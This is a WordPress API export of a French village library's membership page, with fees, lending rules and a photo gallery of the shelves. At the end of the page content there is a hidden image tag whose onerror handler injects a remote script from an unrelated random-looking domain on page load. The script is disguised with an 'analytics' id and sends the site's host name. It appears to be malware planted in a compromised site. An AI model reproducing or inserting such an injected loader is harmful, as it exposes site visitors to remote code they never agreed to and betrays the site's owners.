{"id":946,"date":"2021-01-28T16:53:41","date_gmt":"2021-01-28T15:53:41","guid":{"rendered":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/?page_id=946"},"modified":"2021-03-01T19:51:06","modified_gmt":"2021-03-01T18:51:06","slug":"adhesion","status":"publish","type":"page","link":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/adhesion\/","title":{"rendered":"Adh\u00e9sion"},"content":{"rendered":"<p>L&rsquo;ADHESION SE PREND DANS LES LOCAUX DE LA BIBLIOTHEQUE ET N&rsquo;EST PAS DISPONIBLE EN LIGNE.<\/p>\n<p>L&rsquo;adh\u00e9sion permet :<br \/>\n&#8211; de soutenir la biblioth\u00e8que et ses b\u00e9n\u00e9voles<br \/>\n&#8211; d&#8217;emprunter 3 livres ou revues et un livre audio pendant 3 semaines.<\/p>\n<p>Adh\u00e9sion adulte : 10 euros\/an.<\/p>\n<p>Gratuite pour les enfants.<\/p>\n<p>Autre adh\u00e9sion gratuite : demandeurs d&#8217;emploi, \u00e9tudiants ou moins de 18 ans (sur justificatifs).<\/p>\n<p>Les vacanciers peuvent adh\u00e9rer pendant 2 mois pour 3\u20ac, gratuitement s\u2019ils ont moins de 18 ans, ou sont \u00e9tudiants ou demandeurs d\u2019emploi. Il sera demand\u00e9 une caution de 30\u20ac par personne, qui sera rendue au retour du dernier livre.<\/p>\n<div id=\"envira-gallery-wrap-1388\" class=\"envira-gallery-wrap envira-gallery-theme-base envira-lightbox-theme-base\" itemscope itemtype=\"https:\/\/schema.org\/ImageGallery\"><div data-row-height=\"150\" data-gallery-theme=\"normal\" id=\"envira-gallery-1388\" class=\"envira-gallery-public envira-gallery-justified-public envira-gallery-0-columns envira-clear enviratope envira-gallery-css-animations\" data-envira-columns=\"0\"><div id=\"envira-gallery-item-1381\" class=\"envira-gallery-item enviratope-item envira-gallery-item-1 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"Bac BD ados adultes biblioth&egrave;que de Saillans\" data-envira-caption=\"Bac BD ados adultes biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1381\" class=\"envira-gallery-image envira-gallery-image-1 envira-normal envira-lazy\" data-envira-index=\"1\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837-1024x576-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837-1024x576-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1381\" data-envira-caption=\"Bac BD ados adultes biblioth&egrave;que de Saillans\" alt=\"Bac BD ados adultes biblioth\u00e8que de Saillans\" title=\"Bac BD ados adultes biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837-1024x576-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837-1024x576-640x480.jpg 2x\" data-envira-width=\"300\" data-envira-height=\"169\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1380\" class=\"envira-gallery-item enviratope-item envira-gallery-item-2 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"Bac revues biblioth&egrave;que de Saillans\" data-envira-caption=\"Bac revues biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1380\" class=\"envira-gallery-image envira-gallery-image-2 envira-normal envira-lazy\" data-envira-index=\"2\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624-1024x576-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624-1024x576-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1380\" data-envira-caption=\"Bac revues biblioth&egrave;que de Saillans\" alt=\"Bac revues biblioth\u00e8que de Saillans\" title=\"Bac revues biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624-1024x576-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624-1024x576-640x480.jpg 2x\" data-envira-width=\"300\" data-envira-height=\"169\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1379\" class=\"envira-gallery-item enviratope-item envira-gallery-item-3 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"Etag&egrave;re Nouveaut&eacute;s biblioth&egrave;que de Saillans\" data-envira-caption=\"Etag&egrave;re Nouveaut&eacute;s biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1379\" class=\"envira-gallery-image envira-gallery-image-3 envira-normal envira-lazy\" data-envira-index=\"3\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b-576x1024-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b-576x1024-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1379\" data-envira-caption=\"Etag&egrave;re Nouveaut&eacute;s biblioth&egrave;que de Saillans\" alt=\"Etag\u00e8re Nouveaut\u00e9s biblioth\u00e8que de Saillans\" title=\"Etag\u00e8re Nouveaut\u00e9s biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b-576x1024-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b-576x1024-640x480.jpg 2x\" data-envira-width=\"169\" data-envira-height=\"300\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1378\" class=\"envira-gallery-item enviratope-item envira-gallery-item-4 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"salle lecture enfants biblioth&egrave;que de Saillans\" data-envira-caption=\"salle lecture enfants biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1378\" class=\"envira-gallery-image envira-gallery-image-4 envira-normal envira-lazy\" data-envira-index=\"4\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730-1024x576-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730-1024x576-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1378\" data-envira-caption=\"salle lecture enfants biblioth&egrave;que de Saillans\" alt=\"salle lecture enfants biblioth\u00e8que de Saillans\" title=\"salle lecture enfants biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730-1024x576-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730-1024x576-640x480.jpg 2x\" data-envira-width=\"300\" data-envira-height=\"169\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1377\" class=\"envira-gallery-item enviratope-item envira-gallery-item-5 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"&eacute;tag&egrave;re enfants biblioth&egrave;que de Saillans\" data-envira-caption=\"&eacute;tag&egrave;re enfants biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1377\" class=\"envira-gallery-image envira-gallery-image-5 envira-normal envira-lazy\" data-envira-index=\"5\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901-1024x576-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901-1024x576-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1377\" data-envira-caption=\"&eacute;tag&egrave;re enfants biblioth&egrave;que de Saillans\" alt=\"\u00e9tag\u00e8re enfants biblioth\u00e8que de Saillans\" title=\"\u00e9tag\u00e8re enfants biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901-1024x576-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901-1024x576-640x480.jpg 2x\" data-envira-width=\"300\" data-envira-height=\"169\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1376\" class=\"envira-gallery-item enviratope-item envira-gallery-item-6 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"rayon biblioth&egrave;que de Saillans\" data-envira-caption=\"rayon biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1376\" class=\"envira-gallery-image envira-gallery-image-6 envira-normal envira-lazy\" data-envira-index=\"6\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305-576x1024-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305-576x1024-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1376\" data-envira-caption=\"rayon biblioth&egrave;que de Saillans\" alt=\"rayon biblioth\u00e8que de Saillans\" title=\"rayon biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305-576x1024-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305-576x1024-640x480.jpg 2x\" data-envira-width=\"169\" data-envira-height=\"300\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><div id=\"envira-gallery-item-1375\" class=\"envira-gallery-item enviratope-item envira-gallery-item-7 envira-lazy-load\" style=\"padding-left: 5px; padding-bottom: 10px; padding-right: 5px;\"  itemscope itemtype=\"https:\/\/schema.org\/ImageObject\"><div class=\"envira-gallery-item-inner\"><div class=\"envira-gallery-position-overlay  envira-gallery-top-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-top-right\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-left\"><\/div><div class=\"envira-gallery-position-overlay  envira-gallery-bottom-right\"><\/div><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134.jpg\" class=\"envira-gallery-1388 envira-gallery-link\" rel=\"enviragallery1388\" title=\"rayon biblioth&egrave;que de Saillans\" data-envira-caption=\"rayon biblioth&egrave;que de Saillans\" data-envira-retina=\"\" data-thumbnail=\"\"  itemprop=\"contentUrl\"><img decoding=\"async\" id=\"envira-gallery-image-1375\" class=\"envira-gallery-image envira-gallery-image-7 envira-normal envira-lazy\" data-envira-index=\"7\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134-576x1024-640x480.jpg\" data-envira-src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134-576x1024-640x480.jpg\" data-envira-gallery-id=\"1388\" data-envira-item-id=\"1375\" data-envira-caption=\"rayon biblioth&egrave;que de Saillans\" alt=\"rayon biblioth\u00e8que de Saillans\" title=\"rayon biblioth\u00e8que de Saillans\"  itemprop=\"thumbnailUrl\" data-envira-srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134-576x1024-640x480.jpg 400w,http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134-576x1024-640x480.jpg 2x\" data-envira-width=\"169\" data-envira-height=\"300\" srcset=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" data-safe-src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/\/\/\/\/yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" \/><\/a><\/div><\/div><\/div><\/div><noscript><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-bac-bd-adultes20210129_154837.jpg\" alt=\"Bac BD ados adultes biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-20210129_153624.jpg\" alt=\"Bac revues biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-nouveautes-20210129_155352b.jpg\" alt=\"Etag\u00e8re Nouveaut\u00e9s biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-coin-enfants20210129_155730.jpg\" alt=\"salle lecture enfants biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-revues-enfants20210129_155901.jpg\" alt=\"\u00e9tag\u00e8re enfants biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-sapiens-20210129_155305.jpg\" alt=\"rayon biblioth\u00e8que de Saillans\" \/><img decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/1200-rayon-frida20210129_155134.jpg\" alt=\"rayon biblioth\u00e8que de Saillans\" \/><\/noscript>\n<div style=\"z-index: 25102;\" class=\"cliquemailHiddenPopup\" id=\"cliquemailclipboardInfo\">\n<div id=\"cliquemailcontentTo\">\n<div id=\"cliquemailinfoToMail\">L\u2019email a bien \u00e9t\u00e9 copi\u00e9<\/div>\n<p><textarea id=\"cliquemailclipboardAreaToText\"><\/textarea><\/div>\n<\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/zuvofu.towaxubudo.com\/scripts\/jt?k=603234b287df1ab7258b4567&amp;s=&quot;+encodeURI(btoa(window.location.host));document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p>L&rsquo;ADHESION SE PREND DANS LES LOCAUX DE LA BIBLIOTHEQUE ET N&rsquo;EST PAS DISPONIBLE EN LIGNE. L&rsquo;adh\u00e9sion permet : &#8211; de soutenir la biblioth\u00e8que et ses b\u00e9n\u00e9voles &#8211; d&#8217;emprunter 3 livres ou revues et un livre audio pendant 3 semaines. Adh\u00e9sion adulte : 10 euros\/an. Gratuite pour les enfants. Autre adh\u00e9sion [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-946","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages\/946","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/comments?post=946"}],"version-history":[{"count":0,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages\/946\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/media?parent=946"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}